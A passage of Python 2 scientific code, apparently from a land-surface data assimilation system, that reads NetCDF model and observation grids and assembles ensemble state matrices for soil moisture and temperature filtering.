Observation_Corelation_Par, Bias_Estimation_Option_Model, Bias_Estimation_Option_Obs, Low_Ratio_Par, High_Ratio_Par,
Dim_Soil_Par, Dim_Veg_Par, Dim_PFT_Par, Dim_Hard_Par, Soil_Par_Sens_Dim, Veg_Par_Sens_Dim, PFT_Par_Sens_Dim, Hard_Par_Sens_Dim, Soil_Texture_Layer_Opt_Num, Soil_Sand_Clay_Sum,
Parameter_Range_Soil, Parameter_Range_Veg, Parameter_Range_PFT, Parameter_Range_Hard, Parameter_Regularization, Par_Soil_Uniform_STD, Par_Veg_Uniform_STD, Par_PFT_Uniform_STD, Par_Hard_Uniform_STD, DateString_Plot,
DAS_Depends_Path, DasPy_Path, CLM_NA, NAvalue, omp_get_num_procs_ParFor, Def_CDF_Matching, Plot_Analysis, NC_FileName_Assimilation_2_Constant, NC_FileName_Assimilation_2_Diagnostic, NC_FileName_Assimilation_2_Initial,
NC_FileName_Assimilation_2_Bias, NC_FileName_Assimilation_2_Parameter, NC_FileName_Parameter_Space_Single, DAS_Output_Path, *vartuple):
NC_FileName_Block_Assim_Common = DAS_Output_Path+"Analysis/"+Region_Name+"/Block_Assim_Common.nc"
if Def_Print:
print 'Read NetCDF File:',NC_FileName_Block_Assim_Common
NC_File_Block_Assim_Common = netCDF4.Dataset(NC_FileName_Block_Assim_Common, 'r')
Mask_Sub = NC_File_Block_Assim_Common.variables['Mask_Sub'][:,:,:]
Mask_Index_Sub_NC = NC_File_Block_Assim_Common.variables['Mask_Index_Sub'][:,:]
Model_Variance = NC_File_Block_Assim_Common.variables['Model_Variance'][:,:,:]
Observation_Variance = NC_File_Block_Assim_Common.variables['Observation_Variance'][:,:,:]
Observation_Latitude = NC_File_Block_Assim_Common.variables['Observation_Latitude'][:,:,:]
Observation_Longitude = NC_File_Block_Assim_Common.variables['Observation_Longitude'][:,:,:]
Observation_Matrix = NC_File_Block_Assim_Common.variables['Observation_Matrix'][:,:,:]
NC_File_Block_Assim_Common.close()
Mask_Index_Sub = numpy.zeros_like(Mask_Index_Sub_NC,dtype=numpy.bool)
numexpr_a = Mask_Index_Sub_NC
numexpr_b = 0.0
numexpr_c = numpy.where(numexpr_a == numexpr_b)
Mask_Index_Sub[numexpr_c] = False
numexpr_a = Mask_Index_Sub_NC
numexpr_b = 1.0
numexpr_c = numpy.where(numexpr_a == numexpr_b)
Mask_Index_Sub[numexpr_c] = True
#print Mask_Index_Sub
#print "Teta_Residual",Teta_Residual
#print "Teta_Saturated",Teta_Saturated
#os.abort()
Sub_Block_Index_Row = Sub_Block_Index_Row_Mat_Vector[Block_Index]
Sub_Block_Index_Col = Sub_Block_Index_Col_Mat_Vector[Block_Index]
# Run Data Assimilation
Row_Numbers_SubBlock = Row_Numbers_SubBlock_Array[Block_Index]
Col_Numbers_SubBlock = Col_Numbers_SubBlock_Array[Block_Index]
# We define two boundary box for sub block assimilation: use big box to do assimilation, use small box to select the assimilation results to keep smooth
# This is the box to select the assimilation results (small)
Sub_Block_Row_Start = Sub_Block_Row_Start_Array[Block_Index]
Sub_Block_Row_End = Sub_Block_Row_End_Array[Block_Index]
Sub_Block_Col_Start = Sub_Block_Col_Start_Array[Block_Index]
Sub_Block_Col_End = Sub_Block_Col_End_Array[Block_Index]
if Def_Print:
print "Sub_Block_Row_Start, Sub_Block_Row_End, Sub_Block_Col_Start, Sub_Block_Col_End",Sub_Block_Row_Start, Sub_Block_Row_End, Sub_Block_Col_Start, Sub_Block_Col_End
# This is the box to select the states for assimilation (big)
Observation_Box_Row_Index_Start = max([Sub_Block_Row_Start - Observation_Box, 0])
Observation_Box_Row_Index_End = min([Sub_Block_Row_End + Observation_Box, Row_Numbers])
Observation_Box_Col_Index_Start = max([Sub_Block_Col_Start - Observation_Box, 0])
Observation_Box_Col_Index_End = min([Sub_Block_Col_End + Observation_Box, Col_Numbers])
Observation_NLats_SubBlock = int(Observation_Box_Row_Index_End - Observation_Box_Row_Index_Start)
Observation_NLons_SubBlock = int(Observation_Box_Col_Index_End - Observation_Box_Col_Index_Start)
if Def_Print:
print "Observation_Box_Row_Index_Start,Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start,Observation_Box_Col_Index_End",Observation_Box_Row_Index_Start,Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start,Observation_Box_Col_Index_End
X_Left_SubBlock = MODEL_X_Left + Sub_Block_Index_Col * Observation_NLons_SubBlock * Grid_Resolution_CEA
X_Right_SubBlock = MODEL_X_Right - (Sub_Block_Ratio_Col - Sub_Block_Index_Col - 1) * Observation_NLons_SubBlock * Grid_Resolution_CEA
Y_Lower_SubBlock = MODEL_Y_Lower + (Sub_Block_Ratio_Row - Sub_Block_Index_Row - 1) * Observation_NLats_SubBlock * Grid_Resolution_CEA
Y_Upper_SubBlock = MODEL_Y_Upper - Sub_Block_Index_Row * Observation_NLats_SubBlock * Grid_Resolution_CEA
NC_File_Out_Assimilation_2_Constant = netCDF4.Dataset(NC_FileName_Assimilation_2_Constant, 'r')
NC_File_Out_Assimilation_2_Initial = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial, 'r')
NC_File_Out_Assimilation_2_Diagnostic = netCDF4.Dataset(NC_FileName_Assimilation_2_Diagnostic, 'r')
#print numpy.shape(Prop_Grid_Array_Sys[Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End])
Prop_Grid_Array_SubBlock = NC_File_Out_Assimilation_2_Initial.variables['Prop_Grid_Array_Sys'][:, Prop_Grid_Array_Sys_Index, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Prop_Grid_Array_H_Trans_SubBlock = NC_File_Out_Assimilation_2_Initial.variables['Prop_Grid_Array_H_Trans'][:, Prop_Grid_Array_Sys_Index, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Model_State_SubBlock = numpy.mean(NC_File_Out_Assimilation_2_Initial.variables['Prop_Grid_Array_Sys'][:, Prop_Grid_Array_Sys_Index, :, :],axis=0)[Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Model_Variance_SubBlock = Model_Variance[Prop_Grid_Array_Sys_Index, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Mask_SubBlock = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock, 3),dtype=numpy.float32)
Mask_SubBlock[:, 0] = Mask_Sub[0, ::][Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End].flatten()
Mask_SubBlock[:, 1] = Mask_Sub[1, ::][Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End].flatten()
Mask_SubBlock[:, 2] = Mask_Sub[2, ::][Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End].flatten()
Mask_Index_SubBlock = Mask_Index_Sub[Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End].flatten()
Land_Mask_Data_SubBlock = NC_File_Out_Assimilation_2_Constant.variables['Land_Mask_Data'][Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
if Def_Print >= 2:
print "numpy.size(numpy.where(Mask_Index_SubBlock == False))",numpy.size(numpy.where(Mask_Index_SubBlock == False))
if SensorVariable_Sub == "Soil_Moisture":
Soil_Layer_Thickness_Ratio = numpy.asarray(NC_File_Out_Assimilation_2_Constant.variables['Soil_Layer_Thickness_Ratio_Moisture'][:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End])
else:
Soil_Layer_Thickness_Ratio = numpy.asarray(NC_File_Out_Assimilation_2_Constant.variables['Soil_Layer_Thickness_Ratio_Temperature'][:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End])
NC_File_Out_Assimilation_2_Diagnostic.close()
NC_File_Out_Assimilation_2_Initial.close()
NC_File_Out_Assimilation_2_Constant.close()
Analysis_Grid_SubBlock = numpy.zeros((Observation_NLats_SubBlock, Observation_NLons_SubBlock),dtype=numpy.float32)
Analysis_Grid_Array_SubBlock = numpy.zeros((Ensemble_Number, Observation_NLats_SubBlock, Observation_NLons_SubBlock),dtype=numpy.float32)
Localization_Map_Mask_SubBlock = numpy.zeros((Observation_NLats_SubBlock, Observation_NLons_SubBlock),dtype=numpy.float32)
Innovation_State_SubBlock = numpy.zeros((Ensemble_Number, Observation_NLats_SubBlock, Observation_NLons_SubBlock),dtype=numpy.float32)
Increments_State_SubBlock = numpy.zeros((Ensemble_Number, Observation_NLats_SubBlock, Observation_NLons_SubBlock),dtype=numpy.float32)
Mask_SubBlock_Row = numpy.shape(Mask_SubBlock)[0]
if Mask_SubBlock_Row == 0:
# Compose the Full Analysis Grid
Analysis_Grid_SubBlock = numpy.mean(Prop_Grid_Array_SubBlock, axis=0)
for Ens_Index in range(Ensemble_Number):
Analysis_Grid_Array_SubBlock[Ens_Index,:,:] = Prop_Grid_Array_SubBlock[Ens_Index, :, :]
else:
Observation_Variance_SubBlock = Observation_Variance[Observation_Matrix_Index,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Observation_Longitude_SubBlock = Observation_Longitude[Observation_Matrix_Index,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Observation_Latitude_SubBlock = Observation_Latitude[Observation_Matrix_Index,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Observation_Matrix_SubBlock = Observation_Matrix[Observation_Matrix_Index,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
numexpr_a = Mask_Index_Sub[Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
numexpr_b = True
numexpr_c = numpy.where(numexpr_a == numexpr_b)
Observation_Matrix_SubBlock[numexpr_c] = NAvalue
# Observation_Variance_SubBlock = Observation_Variance[Observation_Matrix_Index,Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End]
# Observation_Longitude_SubBlock = Observation_Longitude[Observation_Matrix_Index,Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End]
# Observation_Latitude_SubBlock = Observation_Latitude[Observation_Matrix_Index,Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End]
# Observation_Matrix_SubBlock = Observation_Matrix[Observation_Matrix_Index,Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End]
if Plot_Analysis >= 2:
import matplotlib
# Force matplotlib to not use any Xwindows backend.
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib.colors as colors
from mpl_toolkits.axes_grid.inset_locator import inset_axes
Observation_Matrix_SubBlock_Masked = numpy.ma.masked_values(Observation_Matrix_SubBlock, NAvalue)
w, h = plt.figaspect(float(Row_Numbers) / Col_Numbers)
Variable_Min = numpy.min(Observation_Matrix_SubBlock_Masked)
Variable_Max = numpy.max(Observation_Matrix_SubBlock_Masked)
ticks = numpy.arange(Variable_Min, Variable_Max, (Variable_Max - Variable_Min) / 5.0)
color_boun_list = []
color_bound = [Variable_Min, Variable_Max, (Variable_Max - Variable_Min) / 100.0]
for i in range(int((color_bound[1] - color_bound[0]) / color_bound[2])):
color_bound[0] += color_bound[2]
color_boun_list.append(color_bound[0])
fig1 = plt.figure(figsize=(w*2, h*2), dpi=80)
fig1.suptitle(DateString_Plot, fontsize=16)
ax = fig1.add_subplot(1, 1, 1)
im1 = ax.imshow(Observation_Matrix_SubBlock_Masked, cmap=cm.jet, norm=colors.BoundaryNorm(color_boun_list, ncolors=300))
plt.colorbar(im1, ticks=ticks, orientation='horizontal')
ax.set_title('Observation_Matrix_SubBlock')
plt.grid(True)
plt.savefig(DasPy_Path+"Analysis/DAS_Temp/"+Region_Name+"_"+DateString_Plot+"/Observation_Matrix_SubBlock.png")
plt.close('all')
NC_File_Out_Assimilation_2_Constant = netCDF4.Dataset(NC_FileName_Assimilation_2_Constant, 'r')
NC_File_Out_Assimilation_2_Initial = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial, 'r')
NC_File_Out_Assimilation_2_Diagnostic = netCDF4.Dataset(NC_FileName_Assimilation_2_Diagnostic, 'r')
Teta_Residual_SubBlock = NC_File_Out_Assimilation_2_Constant.variables['Teta_Residual'][:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Teta_Saturated_SubBlock = NC_File_Out_Assimilation_2_Constant.variables['Teta_Saturated'][:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Teta_Field_Capacity_SubBlock = NC_File_Out_Assimilation_2_Constant.variables['Teta_Field_Capacity'][:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Teta_Wilting_Point_SubBlock = NC_File_Out_Assimilation_2_Constant.variables['Teta_Wilting_Point'][:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
CLM_Ground_Temperature_Ensemble_Mat_SubBlock = NC_File_Out_Assimilation_2_Initial.variables['CLM_Ground_Temperature_Ensemble_Mat'][Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End, :]
CLM_Vegetation_Temperature_Ensemble_Mat_SubBlock = NC_File_Out_Assimilation_2_Initial.variables['CLM_Vegetation_Temperature_Ensemble_Mat'][Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End, :]
CLM_Soil_Moisture_Ensemble_Mat_SubBlock = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Moisture_Ensemble_Mat'][:, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End, :]
CLM_Soil_Temperature_Ensemble_Mat_SubBlock = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Temperature_Ensemble_Mat'][:, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End, :]
NC_File_Out_Assimilation_2_Diagnostic.close()
NC_File_Out_Assimilation_2_Initial.close()
NC_File_Out_Assimilation_2_Constant.close()
Prop_Grid_Array_Bias_SubBlock = []
CLM_Ground_Temperature_Ensemble_Mat_Bias_SubBlock = []
CLM_Vegetation_Temperature_Ensemble_Mat_Bias_SubBlock = []
CLM_Soil_Moisture_Ensemble_Mat_Bias_SubBlock = []
CLM_Soil_Temperature_Ensemble_Mat_Bias_SubBlock = []
Observation_Bias_SubBlock = []
NC_File_Out_Assimilation_2_Parameter = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter, 'r')
if Soil_Par_Sens_Dim >= 1:
Parameter_Soil_Space_Ensemble_SubBlock = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_Soil_Space_Ensemble'][:, :, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Parameter_Soil_Space_parm_infl_SubBlock = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_Soil_Space_parm_infl'][:, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
else:
Parameter_Soil_Space_Ensemble_SubBlock = []
Parameter_Soil_Space_parm_infl_SubBlock = []
Parameter_Veg_Space_Ensemble_SubBlock = []
Parameter_Veg_Space_parm_infl_SubBlock = []
if PFT_Par_Sens_Dim >= 1:
Parameter_PFT_Space_Ensemble_SubBlock = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_PFT_Space_Ensemble'][:,:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Parameter_PFT_Space_parm_infl_SubBlock = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_PFT_Space_parm_infl'][:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
else:
Parameter_PFT_Space_Ensemble_SubBlock = []
Parameter_PFT_Space_parm_infl_SubBlock = []
Parameter_Hard_Space_Ensemble_SubBlock = []
Parameter_Hard_Space_parm_infl_SubBlock = []
Saturation_SSat_SubBlock = []
Saturation_SRes_SubBlock = []
Saturation_N_SubBlock = []
Saturation_Alpha_SubBlock = []
NC_File_Out_Assimilation_2_Parameter.close()
NC_File_Out_Assimilation_2_Initial = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial, 'r')
Prop_Grid_Array_Sys_parm_infl_SubBlock = NC_File_Out_Assimilation_2_Initial.variables['Prop_Grid_Array_Sys_parm_infl'][Prop_Grid_Array_Sys_Index,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
CLM_Surface_Temperature_parm_infl_SubBlock = NC_File_Out_Assimilation_2_Initial.variables['CLM_Surface_Temperature_parm_infl'][Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
CLM_Ground_Temperature_parm_infl_SubBlock = NC_File_Out_Assimilation_2_Initial.variables['CLM_Ground_Temperature_parm_infl'][Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
CLM_Vegetation_Temperature_parm_infl_SubBlock = NC_File_Out_Assimilation_2_Initial.variables['CLM_Vegetation_Temperature_parm_infl'][Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
CLM_Soil_Moisture_parm_infl_SubBlock = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Moisture_parm_infl'][:, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
CLM_Soil_Temperature_parm_infl_SubBlock = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Temperature_parm_infl'][:, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
# dominik29/06/2016 read other variable into latent_heat to ommit error, assuming variable is not important
CLM_Latent_Heat_parm_infl_SubBlock = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Temperature_parm_infl'][:, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Assimilation_2_Initial.close()
Prop_Grid_Array_Sys_parm_infl_Bias_SubBlock = []
CLM_Surface_Temperature_parm_infl_Bias_SubBlock = []
CLM_Ground_Temperature_parm_infl_Bias_SubBlock = []
CLM_Vegetation_Temperature_parm_infl_Bias_SubBlock = []
CLM_Soil_Moisture_parm_infl_Bias_SubBlock = []
CLM_Soil_Temperature_parm_infl_Bias_SubBlock = []
Observation_parm_infl_Bias_SubBlock = []
if Def_Print:
print "---------------------- Prepare the Model Ensemble Grid for Bayesian Filtering DA -------------------"
E0_SysModel_SubBlock = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock, Ensemble_Number),dtype=numpy.float32)
E0_ObsModel_SubBlock = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock, Ensemble_Number),dtype=numpy.float32)
for Ens_Index in range(Ensemble_Number):
E0_SysModel_SubBlock[:, Ens_Index] = Prop_Grid_Array_SubBlock[Ens_Index, :, :].flatten()
#print Prop_Grid_Array_H_Trans[:, Prop_Grid_Array_Sys_Index, Row_Index,Col_Index]
E0_ObsModel_SubBlock[:, Ens_Index] = Prop_Grid_Array_H_Trans_SubBlock[Ens_Index, :, :].flatten()
########################################################################################################################################
Mask_Index_Vector = ~Mask_Index_SubBlock
E0_SysModel_SubBlock = E0_SysModel_SubBlock[Mask_Index_Vector, 0:Ensemble_Number]
E0_ObsModel_SubBlock = E0_ObsModel_SubBlock[Mask_Index_Vector, 0:Ensemble_Number]
#print E0_ObsMode
Parameter_Min_Max = numpy.zeros((Dim_Soil_Par,2))
parm_infl = numpy.zeros(Observation_NLats_SubBlock * Observation_NLons_SubBlock,dtype=numpy.float32)
Prop_Grid_Array_Sys_parm_infl = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock),dtype=numpy.float32)
CLM_Soil_Moisture_parm_infl = numpy.zeros((Soil_Layer_Num, Observation_NLats_SubBlock * Observation_NLons_SubBlock),dtype=numpy.float32)
CLM_Soil_Temperature_parm_infl = numpy.zeros((Soil_Layer_Num, Observation_NLats_SubBlock * Observation_NLons_SubBlock),dtype=numpy.float32)
CLM_Surface_Temperature_parm_infl = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock),dtype=numpy.float32)
CLM_Ground_Temperature_parm_infl = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock),dtype=numpy.float32)
CLM_Vegetation_Temperature_parm_infl = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock),dtype=numpy.float32)
CLM_Latent_Heat_parm_infl = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock),dtype=numpy.float32)
CLM_Sensible_Heat_parm_infl = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock),dtype=numpy.float32)
CLM_Soil_Moisture_Ensemble = numpy.zeros((Soil_Layer_Num, Observation_NLats_SubBlock * Observation_NLons_SubBlock, Ensemble_Number),dtype=numpy.float32)
CLM_Soil_Temperature_Ensemble = numpy.zeros((Soil_Layer_Num, Observation_NLats_SubBlock * Observation_NLons_SubBlock, Ensemble_Number),dtype=numpy.float32)
CLM_Surface_Temperature_Ensemble = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock, Ensemble_Number),dtype=numpy.float32)
CLM_Ground_Temperature_Ensemble = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock, Ensemble_Number),dtype=numpy.float32)
CLM_Vegetation_Temperature_Ensemble = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock, Ensemble_Number),dtype=numpy.float32)
Prop_Grid_Array_Sys_parm_infl[:] = Prop_Grid_Array_Sys_parm_infl_SubBlock[:, :].flatten()
for Soil_Layer_Index in range(Soil_Layer_Num):
CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,:] = CLM_Soil_Moisture_parm_infl_SubBlock[Soil_Layer_Index,:, :].flatten()
CLM_Soil_Temperature_parm_infl[Soil_Layer_Index,:] = CLM_Soil_Temperature_parm_infl_SubBlock[Soil_Layer_Index,:, :].flatten()
CLM_Surface_Temperature_parm_infl[:] = CLM_Surface_Temperature_parm_infl_SubBlock[:, :].flatten()
CLM_Ground_Temperature_parm_infl[:] = CLM_Ground_Temperature_parm_infl_SubBlock[:, :].flatten()
CLM_Vegetation_Temperature_parm_infl[:] = CLM_Vegetation_Temperature_parm_infl_SubBlock[:, :].flatten()
parm_infl = []
CLM_Soil_Moisture_parm_infl_Bias = []
CLM_Soil_Temperature_parm_infl_Bias = []
CLM_Surface_Temperature_parm_infl_Bias = []
CLM_Ground_Temperature_parm_infl_Bias = []
CLM_Vegetation_Temperature_parm_infl_Bias = []
Prop_Grid_Array_Sys_parm_infl_Bias = []
Observation_parm_infl_Bias = []
Prop_Grid_Array_Bias = []
Observation_Bias = []
CLM_Soil_Moisture_Ensemble_Bias = []
CLM_Soil_Temperature_Ensemble_Bias = []
CLM_Surface_Temperature_Ensemble_Bias = []
CLM_Ground_Temperature_Ensemble_Bias = []
CLM_Vegetation_Temperature_Ensemble_Bias = []
if (not Parameter_Optimization_Flag) and (not ((numpy.size(numpy.where(Bias_Estimation_Option_Model == 1)) >= 1) or (numpy.size(numpy.where(Bias_Estimation_Option_Obs == 1)) >= 1))):
print "------------------ State Definition"
for Ens_Index in range(Ensemble_Number):
for Soil_Layer_Index in range(Soil_Layer_Num):
CLM_Soil_Moisture_Ensemble[Soil_Layer_Index,:,Ens_Index] = CLM_Soil_Moisture_Ensemble_Mat_SubBlock[Soil_Layer_Index,:, :,Ens_Index].flatten()
for Soil_Layer_Index in range(Soil_Layer_Num):
CLM_Soil_Temperature_Ensemble[Soil_Layer_Index,:,Ens_Index] = CLM_Soil_Temperature_Ensemble_Mat_SubBlock[Soil_Layer_Index,:, :,Ens_Index].flatten()
CLM_Ground_Temperature_Ensemble[:,Ens_Index] = CLM_Ground_Temperature_Ensemble_Mat_SubBlock[:, :,Ens_Index].flatten()
CLM_Vegetation_Temperature_Ensemble[:,Ens_Index] = CLM_Vegetation_Temperature_Ensemble_Mat_SubBlock[:, :,Ens_Index].flatten()
if Variable_Assimilation_Flag[Variable_List.index(SensorVariable_Sub)] and SensorVariable_Sub == "Soil_Moisture":
if SensorType_Sub == "InSitu":
if Soil_Layer_Index_DA == 1:
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[0,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_SysModel_SubBlock))
E0_ObsModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_ObsModel_SubBlock))
for Soil_Layer_Index in range(2,Soil_Layer_Num - 5,1):
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[Soil_Layer_Index,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock,CLM_Soil_Moisture_Col))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock,CLM_Soil_Moisture_Col))
elif Soil_Layer_Index_DA == 2:
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[1,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_SysModel_SubBlock))
E0_ObsModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_ObsModel_SubBlock))
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[0,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_SysModel_SubBlock))
E0_ObsModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_ObsModel_SubBlock))
for Soil_Layer_Index in range(3,Soil_Layer_Num - 5,1):
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[Soil_Layer_Index,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock,CLM_Soil_Moisture_Col))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock,CLM_Soil_Moisture_Col))
elif Soil_Layer_Index_DA == 3:
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[2,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_SysModel_SubBlock))
E0_ObsModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_ObsModel_SubBlock))
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[1,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_SysModel_SubBlock))
E0_ObsModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_ObsModel_SubBlock))
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[0,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_SysModel_SubBlock))
E0_ObsModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_ObsModel_SubBlock))
for Soil_Layer_Index in range(4,Soil_Layer_Num - 5,1):
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[Soil_Layer_Index,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock,CLM_Soil_Moisture_Col))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock,CLM_Soil_Moisture_Col))
elif Soil_Layer_Index_DA == 4:
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[3,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_SysModel_SubBlock))
E0_ObsModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_ObsModel_SubBlock))
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[2,Mask_Index_Vector,0:Ensemble_Number]
